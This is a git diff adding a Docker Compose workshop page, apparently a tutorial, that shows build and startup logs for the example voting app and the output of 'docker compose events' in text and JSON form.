Compose up + +```sh +example-voting-app git:(main) docker compose up +[+] Running 9/9 + β Ώ db Pulled 9.7s + β Ώ af6eaf76a39c Already exists 0.0s + β Ώ 71286d2ce0cc Pull complete 1.7s + β Ώ b82afe47906a Pull complete 1.8s + β Ώ 75d514bb4aa7 Pull complete 5.6s + β Ώ 217da6f41d9e Pull complete 5.7s + β Ώ 39a3f4823126 Pull complete 5.7s + β Ώ ed6571a6afcc Pull complete 5.8s + β Ώ 8ae7d38f54c4 Pull complete 5.8s +[+] Building 36.2s (42/42) FINISHED + => [example-voting-app-result internal] load .dockerignore 0.0s + => => transferring context: 54B 0.0s + => [example-voting-app-result internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 517B 0.0s + => [example-voting-app-result internal] load metadata for docker.io/library/node:18-slim 5.1s + => [example-voting-app-vote internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [example-voting-app-vote internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 740B 0.0s + => [example-voting-app-vote internal] load metadata for docker.io/library/python:3.9-slim 5.2s + => [example-voting-app-worker internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [example-voting-app-worker internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 1.45kB 0.0s + => [example-voting-app-worker internal] load metadata for mcr.microsoft.com/dotnet/runtime:7.0 1.4s + => [example-voting-app-worker internal] load metadata for mcr.microsoft.com/dotnet/sdk:7.0 1.3s + => [example-voting-app-worker build 1/7] FROM mcr.microsoft.com/dotnet/sdk:7.0@sha256:bd1ccc2332fc03c6df1659ed125f67f02666f9f188947a80cec4e7afd3c7f98d 18.5s + => => resolve mcr.microsoft.com/dotnet/sdk:7.0@sha256:bd1ccc2332fc03c6df1659ed125f67f02666f9f188947a80cec4e7afd3c7f98d 0.0s + => => 
sha256:8907849f91e57df0899482d802a3fc140b67a6d5febaa503837ed2233d662283 13.55MB / 13.55MB 4.5s + => => sha256:afd8a1df3eb1e6747064359ca9bc37db5330672279e0be935849f256d4b3f0b1 155.94MB / 155.94MB 12.4s + => => sha256:e4f0af37a4eb47b3e26810a4721ebdf36d9342d580d8c6027bd99a7596acc98c 25.39MB / 25.39MB 1.9s + => => sha256:d1a2ad48fbf7e8af456454a11f1e058cdb9ba171ef35dace5d13b495b053cc84 9.80MB / 9.80MB 1.1s + => => extracting sha256:d1a2ad48fbf7e8af456454a11f1e058cdb9ba171ef35dace5d13b495b053cc84 0.1s + => => extracting sha256:e4f0af37a4eb47b3e26810a4721ebdf36d9342d580d8c6027bd99a7596acc98c 0.5s + => => extracting sha256:afd8a1df3eb1e6747064359ca9bc37db5330672279e0be935849f256d4b3f0b1 4.0s + => => extracting sha256:8907849f91e57df0899482d802a3fc140b67a6d5febaa503837ed2233d662283 0.4s + => [example-voting-app-worker internal] load build context 0.0s + => => transferring context: 7.48kB 0.0s + => [example-voting-app-worker stage-1 1/3] FROM mcr.microsoft.com/dotnet/runtime:7.0@sha256:1ed4d59643e6b8b41b64ffa00b524ebca9de287bd3efa9955f9fa706f1dd0471 3.6s + => => resolve mcr.microsoft.com/dotnet/runtime:7.0@sha256:1ed4d59643e6b8b41b64ffa00b524ebca9de287bd3efa9955f9fa706f1dd0471 0.0s + => => sha256:a34d8d2343cd4d1705a15b9494ef9b39d01832d43c3a09fe129458c8bfdabeee 155B / 155B 0.2s + => => sha256:b7dfc290d72d9065e3276dcd05c3323942f8947a71dd5e7b4304f7a68d25c9c9 30.71MB / 30.71MB 3.1s + => => sha256:235af35749f09d6549b76fb376b3929ec21198feee4e72ffb396514dd11b374e 14.92MB / 14.92MB 1.8s + => => sha256:66dbba0fb1b568cc3ffd53409ba2f9f82995ab7f80e379338f3f36e4dcd223be 30.06MB / 30.06MB 2.2s + => => extracting sha256:66dbba0fb1b568cc3ffd53409ba2f9f82995ab7f80e379338f3f36e4dcd223be 0.6s + => => extracting sha256:235af35749f09d6549b76fb376b3929ec21198feee4e72ffb396514dd11b374e 0.2s + => => extracting sha256:b7dfc290d72d9065e3276dcd05c3323942f8947a71dd5e7b4304f7a68d25c9c9 0.5s + => => extracting sha256:a34d8d2343cd4d1705a15b9494ef9b39d01832d43c3a09fe129458c8bfdabeee 0.0s + => [example-voting-app-result 1/7] FROM docker.io/library/node:18-slim@sha256:36f3403a001b82d525afd2bdb7fcec0980543277dd86e9657964cce3438ae4b7 4.1s + => => resolve docker.io/library/node:18-slim@sha256:36f3403a001b82d525afd2bdb7fcec0980543277dd86e9657964cce3438ae4b7 0.0s + => => sha256:8e5162ad1efe24f915933435516b8cb1510cc80704bdf87c868e995f4f871cd9 451B / 451B 0.4s + => => sha256:1ad5fb92392ab64732e756b44967f7ecead775eb06ce3f9cd43d1a22bd9c9458 2.77MB / 2.77MB 1.8s + => => sha256:cc36a0fa43f85245c8d9977661c82a89cfc226fc26e5861670cf62c0933f62c4 46.14MB / 46.14MB 2.9s + => => sha256:d1d4cdb9c955626876afec2a95c6f7487481e067acc0a8be1867f678003266df 4.19kB / 4.19kB 0.6s + => => extracting sha256:d1d4cdb9c955626876afec2a95c6f7487481e067acc0a8be1867f678003266df 0.0s + => => extracting sha256:cc36a0fa43f85245c8d9977661c82a89cfc226fc26e5861670cf62c0933f62c4 1.0s + => => extracting sha256:1ad5fb92392ab64732e756b44967f7ecead775eb06ce3f9cd43d1a22bd9c9458 0.1s + => => extracting sha256:8e5162ad1efe24f915933435516b8cb1510cc80704bdf87c868e995f4f871cd9 0.0s + => [example-voting-app-result internal] load build context 0.0s + => => transferring context: 302.01kB 0.0s + => [example-voting-app-worker stage-1 2/3] WORKDIR /app 0.2s + => [example-voting-app-vote 1/6] FROM docker.io/library/python:3.9-slim@sha256:2ed9cf48cf86eb638a9ceb555737161fbb20fa0474494269150b4d6c2653227b 2.7s + => => resolve docker.io/library/python:3.9-slim@sha256:2ed9cf48cf86eb638a9ceb555737161fbb20fa0474494269150b4d6c2653227b 0.0s + => => 
sha256:98b352a9715d74c4172491762aded5e741a28ce83df0fd99321a1031b1d5b6c8 3.17MB / 3.17MB 0.6s + => => sha256:14b89f7d65aecdc5e63ab5759d5135ec777524bcdbc4adb5200fac65c825655d 233B / 233B 0.3s + => => sha256:ac439b0377b530ec2bd538701b6611c91588fdf491f0566458373c314866cfb8 11.22MB / 11.22MB 0.9s + => => sha256:1f3ba05aa6dc6bcf7f4f57d5eaec80fd3edffbffde2e9727df29d63c978f0b99 1.06MB / 1.06MB 1.4s + => => extracting sha256:1f3ba05aa6dc6bcf7f4f57d5eaec80fd3edffbffde2e9727df29d63c978f0b99 0.0s + => => extracting sha256:ac439b0377b530ec2bd538701b6611c91588fdf491f0566458373c314866cfb8 0.2s + => => extracting sha256:14b89f7d65aecdc5e63ab5759d5135ec777524bcdbc4adb5200fac65c825655d 0.0s + => => extracting sha256:98b352a9715d74c4172491762aded5e741a28ce83df0fd99321a1031b1d5b6c8 0.1s + => [example-voting-app-vote internal] load build context 0.0s + => => transferring context: 6.11kB 0.0s + => [example-voting-app-vote 2/6] RUN apt-get update && apt-get install -y --no-install-recommends curl && rm -rf /var/lib/apt/lists/* 4.2s + => [example-voting-app-result 2/7] RUN apt-get update && apt-get install -y --no-install-recommends curl tini && rm -rf /var/lib/apt/lists/* 3.4s + => [example-voting-app-vote 3/6] WORKDIR /app 0.0s + => [example-voting-app-vote 4/6] COPY requirements.txt /app/requirements.txt 0.0s + => [example-voting-app-vote 5/6] RUN pip install -r requirements.txt 3.0s + => [example-voting-app-result 3/7] WORKDIR /app 0.0s + => [example-voting-app-result 4/7] RUN npm install -g nodemon 1.9s + => [example-voting-app-result 5/7] COPY package*.json ./ 0.0s + => [example-voting-app-result 6/7] RUN npm ci && npm cache clean --force && mv /app/node_modules /node_modules 2.1s + => [example-voting-app-vote 6/6] COPY . . 0.0s + => [example-voting-app-vote] exporting to docker image format 3.8s + => => exporting layers 0.5s + => => exporting manifest sha256:8e6e3010a750bd01eebd409fa77a5e98f99f4aecefe6de2b8eb43096e7de9bcb 0.0s + => => exporting config sha256:5c1cf62b540c59ce0a99930302aae92523c6db3e77d0e8737d4d4260908880ee 0.0s + => => sending tarball 3.2s + => importing to docker 2.4s + => [example-voting-app-result 7/7] COPY . . 0.0s + => [example-voting-app-result] exporting to docker image format 3.9s + => => exporting layers 0.3s + => => exporting manifest sha256:91ac5a4bcc08913d88936fca0f6f36a58a69cb0e2de202691b3fe6c545d21e7c 0.0s + => => exporting config sha256:223b94fc00aee779a4ee25ce9d1c69cab293aedd539b843faba7c1a47e894b29 0.0s + => => sending tarball 3.6s + => importing to docker 2.4s + => [example-voting-app-worker build 2/7] RUN echo "I am running on linux/arm64, building for linux/arm64" 0.1s + => [example-voting-app-worker build 3/7] WORKDIR /source 0.0s + => [example-voting-app-worker build 4/7] COPY *.csproj . 0.0s + => [example-voting-app-worker build 5/7] RUN case linux/arm64 in "linux/amd64") ARCH=x64 ;; "linux/arm64") ARCH=arm64 ;; "linux/arm64/v8") ARCH=a 12.3s + => [example-voting-app-worker build 6/7] COPY . . 0.0s + => [example-voting-app-worker build 7/7] RUN case linux/arm64 in "linux/amd64") ARCH=x64 ;; "linux/arm64") ARCH=arm64 ;; "linux/arm64/v8") ARCH=a 1.7s + => [example-voting-app-worker stage-1 3/3] COPY --from=build /app . 
0.0s + => [example-voting-app-worker] exporting to docker image format 1.8s + => => exporting layers 0.1s + => => exporting manifest sha256:93ec3cbb0ef4e82b397475cf25ca330aef2b4b2badaa7ad86541b00e48305e63 0.0s + => => exporting config sha256:8f82fda1dae8bc1c7c040c0c3045239fd48547d34ee3d5d458683cef7b107188 0.0s + => => sending tarball 1.7s + => importing to docker 0.7s +[+] Running 8/5 + β Ώ Network example-voting-app_back-tier Created 0.1s + β Ώ Network example-voting-app_front-tier Created 0.1s + β Ώ Volume "example-voting-app_db-data" Created 0.0s + β Ώ Container example-voting-app-redis-1 Created 0.2s + β Ώ Container example-voting-app-db-1 Created 0.2s + β Ώ Container example-voting-app-vote-1 Created 0.0s + β Ώ Container example-voting-app-worker-1 Created 0.0s + β Ώ Container example-voting-app-result-1 Created 0.0s +Attaching to example-voting-app-db-1, example-voting-app-redis-1, example-voting-app-result-1, example-voting-app-vote-1, example-voting-app-worker-1 +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.311 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.313 # Redis version=7.0.9, bits=64, commit=00000000, modified=0, pid=1, just started +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.313 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.313 * monotonic clock: POSIX clock_gettime +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.314 * Running mode=standalone, port=6379. +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.315 # Server initialized +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.318 * Ready to accept connections +example-voting-app-db-1 | The files belonging to this database system will be owned by user "postgres". +example-voting-app-db-1 | This user must also own the server process. +example-voting-app-db-1 | +example-voting-app-db-1 | The database cluster will be initialized with locale "en_US.utf8". +example-voting-app-db-1 | The default database encoding has accordingly been set to "UTF8". +example-voting-app-db-1 | The default text search configuration will be set to "english". +example-voting-app-db-1 | +example-voting-app-db-1 | Data page checksums are disabled. +example-voting-app-db-1 | +example-voting-app-db-1 | fixing permissions on existing directory /var/lib/postgresql/data ... ok +example-voting-app-db-1 | creating subdirectories ... ok +example-voting-app-db-1 | selecting dynamic shared memory implementation ... posix +example-voting-app-db-1 | selecting default max_connections ... 100 +example-voting-app-db-1 | selecting default shared_buffers ... 128MB +example-voting-app-db-1 | selecting default time zone ... UTC +example-voting-app-db-1 | creating configuration files ... ok +example-voting-app-db-1 | running bootstrap script ... ok +example-voting-app-db-1 | sh: locale: not found +example-voting-app-db-1 | 2023-03-04 14:41:27.703 UTC [30] WARNING: no usable system locales were found +example-voting-app-db-1 | performing post-bootstrap initialization ... ok +example-voting-app-db-1 | initdb: warning: enabling "trust" authentication for local connections +example-voting-app-db-1 | initdb: hint: You can change this by editing pg_hba.conf or using the option -A, or --auth-local and --auth-host, the next time you run initdb. +example-voting-app-db-1 | syncing data to disk ... 
ok +example-voting-app-db-1 | +example-voting-app-db-1 | +example-voting-app-db-1 | Success. You can now start the database server using: +example-voting-app-db-1 | +example-voting-app-db-1 | pg_ctl -D /var/lib/postgresql/data -l logfile start +example-voting-app-db-1 | +example-voting-app-db-1 | waiting for server to start....2023-03-04 14:41:28.118 UTC [36] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 14:41:28.120 UTC [36] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 14:41:28.124 UTC [39] LOG: database system was shut down at 2023-03-04 14:41:28 UTC +example-voting-app-db-1 | 2023-03-04 14:41:28.127 UTC [36] LOG: database system is ready to accept connections +example-voting-app-db-1 | done +example-voting-app-db-1 | server started +example-voting-app-db-1 | +example-voting-app-db-1 | /usr/local/bin/docker-entrypoint.sh: ignoring /docker-entrypoint-initdb.d/* +example-voting-app-db-1 | +example-voting-app-db-1 | waiting for server to shut down....2023-03-04 14:41:28.218 UTC [36] LOG: received fast shutdown request +example-voting-app-db-1 | 2023-03-04 14:41:28.220 UTC [36] LOG: aborting any active transactions +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [36] LOG: background worker "logical replication launcher" (PID 42) exited with exit code 1 +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [37] LOG: shutting down +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [37] LOG: checkpoint starting: shutdown immediate +example-voting-app-db-1 | 2023-03-04 14:41:28.227 UTC [37] LOG: checkpoint complete: wrote 3 buffers (0.0%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.002 s, sync=0.001 s, total=0.005 s; sync files=2, longest=0.001 s, average=0.001 s; distance=0 kB, estimate=0 kB +example-voting-app-db-1 | 2023-03-04 14:41:28.233 UTC [36] LOG: database system is shut down +example-voting-app-db-1 | done +example-voting-app-db-1 | server stopped +example-voting-app-db-1 | +example-voting-app-db-1 | PostgreSQL init process complete; ready for start up. 
+example-voting-app-db-1 | +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: listening on IPv4 address "0.0.0.0", port 5432 +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: listening on IPv6 address "::", port 5432 +example-voting-app-db-1 | 2023-03-04 14:41:28.344 UTC [1] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 14:41:28.347 UTC [50] LOG: database system was shut down at 2023-03-04 14:41:28 UTC +example-voting-app-db-1 | 2023-03-04 14:41:28.351 UTC [1] LOG: database system is ready to accept connections +Error response from daemon: Ports are not available: exposing port TCP 0.0.0.0:5000 -> 0.0.0.0:0: listen tcp 0.0.0.0:5000: bind: address already in use +➜ example-voting-app git:(main) + + + +``` + +#### check docker compose events + + +``` +docker compose events +2023-03-04 20:12:13.002384 container exec_create: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (name=example-voting-app-redis-1, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=a242ce36c4b7595edfe03a0f3f01d71b201f003ab0e04cf04f26ee17e2d5e668, image=redis:alpine, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks) + +2023-03-04 20:12:13.003007 container exec_start: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/Target=/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, execID=a242ce36c4b7595edfe03a0f3f01d71b201f003ab0e04cf04f26ee17e2d5e668, image=redis:alpine, name=example-voting-app-redis-1) + +2023-03-04 20:12:13.022680 container exec_create: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, image=postgres:15-alpine, desktop.docker.io/binds/0/Target=/healthchecks, execID=df7c12ef54c8029a23eb9febcb677c8f8c0984cf5c3da7c5634d268b1b3804b3, name=example-voting-app-db-1) + +2023-03-04 20:12:13.023200 container exec_start: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (name=example-voting-app-db-1, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=df7c12ef54c8029a23eb9febcb677c8f8c0984cf5c3da7c5634d268b1b3804b3, image=postgres:15-alpine, desktop.docker.io/binds/0/Target=/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile) + +2023-03-04 20:12:13.078489 container exec_die c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Target=/healthchecks, image=redis:alpine, execID=a242ce36c4b7595edfe03a0f3f01d71b201f003ab0e04cf04f26ee17e2d5e668, exitCode=0, desktop.docker.io/binds/0/SourceKind=hostFile, 
desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, name=example-voting-app-redis-1) + +2023-03-04 20:12:13.097001 container exec_die 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (image=postgres:15-alpine, desktop.docker.io/binds/0/SourceKind=hostFile, exitCode=0, name=example-voting-app-db-1, desktop.docker.io/binds/0/Target=/healthchecks, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=df7c12ef54c8029a23eb9febcb677c8f8c0984cf5c3da7c5634d268b1b3804b3) + +2023-03-04 20:12:18.082975 container exec_create: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (image=redis:alpine, name=example-voting-app-redis-1, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, execID=4293df2a37da48526e1c21e417c25d34e8947171a66a44bb9741036f09903032) + +2023-03-04 20:12:18.083432 container exec_start: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=4293df2a37da48526e1c21e417c25d34e8947171a66a44bb9741036f09903032, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, image=redis:alpine, name=example-voting-app-redis-1) + +2023-03-04 20:12:18.099740 container exec_create: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (name=example-voting-app-db-1, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, image=postgres:15-alpine, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, execID=725b7d5bf401d7c3944d8432b78835ebd86742b696ce30f6166da8b8d3802f63) + +2023-03-04 20:12:18.100090 container exec_start: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, execID=725b7d5bf401d7c3944d8432b78835ebd86742b696ce30f6166da8b8d3802f63, image=postgres:15-alpine, name=example-voting-app-db-1) + +2023-03-04 20:12:18.169539 container exec_die c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, image=redis:alpine, name=example-voting-app-redis-1, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, execID=4293df2a37da48526e1c21e417c25d34e8947171a66a44bb9741036f09903032, exitCode=0) + +2023-03-04 20:12:18.185722 container exec_die 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/SourceKind=hostFile, image=postgres:15-alpine, desktop.docker.io/binds/0/Target=/healthchecks, 
exitCode=0, name=example-voting-app-db-1, execID=725b7d5bf401d7c3944d8432b78835ebd86742b696ce30f6166da8b8d3802f63, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks) + +2023-03-04 20:12:23.173394 container exec_create: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Target=/healthchecks, image=redis:alpine, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, execID=7225d11881403d700013274bbcd9ab8c0dcf8e1ec55ecf8eefc63af51cb10ebe, name=example-voting-app-redis-1) + +2023-03-04 20:12:23.173847 container exec_start: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=7225d11881403d700013274bbcd9ab8c0dcf8e1ec55ecf8eefc63af51cb10ebe, image=redis:alpine, name=example-voting-app-redis-1) + +2023-03-04 20:12:23.188391 container exec_create: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/Target=/healthchecks, name=example-voting-app-db-1, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=8c18f808739a1a14c190db460030da0bb1b4a68a153f202f55a2c840f96bf630, image=postgres:15-alpine) + +2023-03-04 20:12:23.188516 container exec_start: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=8c18f808739a1a14c190db460030da0bb1b4a68a153f202f55a2c840f96bf630, image=postgres:15-alpine, name=example-voting-app-db-1, desktop.docker.io/binds/0/Target=/healthchecks) + +2023-03-04 20:12:23.241796 container exec_die c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/SourceKind=hostFile, execID=7225d11881403d700013274bbcd9ab8c0dcf8e1ec55ecf8eefc63af51cb10ebe, exitCode=0, name=example-voting-app-redis-1, desktop.docker.io/binds/0/Target=/healthchecks, image=redis:alpine, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks) + +2023-03-04 20:12:23.263784 container exec_die 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, exitCode=0, name=example-voting-app-db-1, execID=8c18f808739a1a14c190db460030da0bb1b4a68a153f202f55a2c840f96bf630, image=postgres:15-alpine) + +``` + +#### use --json flag + +``` + +docker compose events --json +{"action":"exec_create: /bin/sh -c 
/healthchecks/redis.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"8f907207527e01ca85a0d73227b35a6da73ed8402de4336e1acb312c46e9473e","image":"redis:alpine","name":"example-voting-app-redis-1"},"id":"c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406","service":"redis","time":"2023-03-04T20:30:14.926031584+05:30","type":"container"} +{"action":"exec_start: /bin/sh -c /healthchecks/redis.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"8f907207527e01ca85a0d73227b35a6da73ed8402de4336e1acb312c46e9473e","image":"redis:alpine","name":"example-voting-app-redis-1"},"id":"c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406","service":"redis","time":"2023-03-04T20:30:14.926920001+05:30","type":"container"} +{"action":"exec_create: /bin/sh -c /healthchecks/postgres.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"006d0a097e9819360bf647cc7f2f5c75723588a546b14359267b4b3a0b169310","image":"postgres:15-alpine","name":"example-voting-app-db-1"},"id":"0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6","service":"db","time":"2023-03-04T20:30:14.940481834+05:30","type":"container"} +{"action":"exec_start: /bin/sh -c /healthchecks/postgres.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"006d0a097e9819360bf647cc7f2f5c75723588a546b14359267b4b3a0b169310","image":"postgres:15-alpine","name":"example-voting-app-db-1"},"id":"0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6","service":"db","time":"2023-03-04T20:30:14.941143834+05:30","type":"container"} +{"action":"exec_die","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"8f907207527e01ca85a0d73227b35a6da73ed8402de4336e1acb312c46e9473e","exitCode":"0","image":"redis:alpine","name":"example-voting-app-redis-1"},"id":"c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406","service":"redis","time":"2023-03-04T20:30:15.009103251+05:30","type":"container"} 
+{"action":"exec_die","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"006d0a097e9819360bf647cc7f2f5c75723588a546b14359267b4b3a0b169310","exitCode":"0","image":"postgres:15-alpine","name":"example-voting-app-db-1"},"id":"0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6","service":"db","time":"2023-03-04T20:30:15.026884834+05:30","type":"container"} +{"action":"exec_create: /bin/sh -c /healthchecks/redis.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docke + + +``` \ No newline at end of file diff --git a/content/en/docker/a32.docker-compose-exec 2.md b/content/en/docker/a32.docker-compose-exec 2.md new file mode 100644 index 0000000..74d5fd2 --- /dev/null +++ b/content/en/docker/a32.docker-compose-exec 2.md @@ -0,0 +1,83 @@ +--- +title: "Docker Compose CLI - Exec Command " +description: " Execute a command in a running container. " +slug: 